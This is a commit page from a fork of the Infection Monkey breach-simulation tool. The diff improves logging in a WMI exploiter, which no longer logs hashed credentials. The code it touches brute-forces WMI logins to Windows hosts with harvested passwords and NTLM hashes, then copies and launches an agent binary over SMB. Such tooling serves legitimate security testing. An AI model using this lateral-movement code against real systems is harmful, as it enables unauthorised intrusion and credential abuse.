p20319658
/
monkey
forked from p34709852/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: improve logging in wmiexec.py

This commit is contained in:
vakarisz 2022-03-08 14:15:17 +02:00
parent af9736a8ea
commit d7e222c8a8
1 changed files with 27 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

58
monkey/infection_monkey/exploit/wmiexec.py
View File

@ -2,6 +2,7 @@ import logging
import ntpath
import socket
import traceback
from typing import List
from impacket.dcerpc.v5.rpcrt import DCERPCException
@ -26,25 +27,12 @@ class WmiExploiter(HostExploiter):
@WmiTools.dcom_wrap
def _exploit_host(self):
src_path = get_target_monkey(self.host)
if not src_path:
logger.info("Can't find suitable monkey executable for host %r", self.host)
return False
creds = self._config.get_exploit_user_password_or_hash_product()
for user, password, lm_hash, ntlm_hash in creds:
password_hashed = self._config.hash_sensitive_data(password)
lm_hash_hashed = self._config.hash_sensitive_data(lm_hash)
ntlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
creds_for_logging = (
"user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): "
"({},{},{},{})".format(user, password_hashed, lm_hash_hashed, ntlm_hash_hashed)
)
logger.debug(
("Attempting to connect %r using WMI with " % self.host) + creds_for_logging
)
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
logger.debug(f"Attempting to connect to {self.host} using WMI with {creds_for_log}")
wmi_connection = WmiTools.WmiConnection()
@ -52,26 +40,21 @@ class WmiExploiter(HostExploiter):
wmi_connection.connect(self.host, user, password, None, lm_hash, ntlm_hash)
except AccessDeniedException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug(
("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
)
logger.debug(f"Failed connecting to {self.host} using WMI")
continue
except DCERPCException:
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
logger.debug(
("Failed connecting to %r using WMI with " % self.host) + creds_for_logging
)
logger.debug(f"Failed connecting to {self.host} using WMI")
continue
except socket.error:
logger.debug(
("Network error in WMI connection to %r with " % self.host) + creds_for_logging
)
logger.debug(f"Network error in WMI connection to {self.host}")
return False
except Exception as exc:
logger.debug(
("Unknown WMI connection error to %r with " % self.host)
+ creds_for_logging
+ (" (%s):\n%s" % (exc, traceback.format_exc()))
f"Unknown WMI connection error to {self.host}: "
f"{exc} {traceback.format_exc()}"
)
return False
@ -82,7 +65,7 @@ class WmiExploiter(HostExploiter):
wmi_connection,
"Win32_Process",
fields=("Caption",),
where="Name='%s'" % ntpath.split(src_path)[-1],
where="Name='{0}'".format(self.options["dropper_target_path_win_64"]),
)
if process_list:
wmi_connection.close()
@ -90,11 +73,12 @@ class WmiExploiter(HostExploiter):
logger.debug("Skipping %r - already infected", self.host)
return False
# copy the file remotely using SMB
downloaded_agent = self.agent_repository.get_agent_binary(self.host.os["type"])
remote_full_path = SmbTools.copy_file(
self.host,
src_path,
self._config.dropper_target_path_win_32,
downloaded_agent,
self.options["dropper_target_path_win_64"],
user,
password,
lm_hash,
@ -153,3 +137,15 @@ class WmiExploiter(HostExploiter):
return success
return False
def _get_credential_string(creds: List) -> str:
cred_strs = [
(creds[0], "username"),
(creds[1], "password"),
(creds[2], "lm hash"),
(creds[3], "nt hash"),
]
present_creds = [cred[1] for cred in cred_strs if cred[0]]
return ", ".join(present_creds)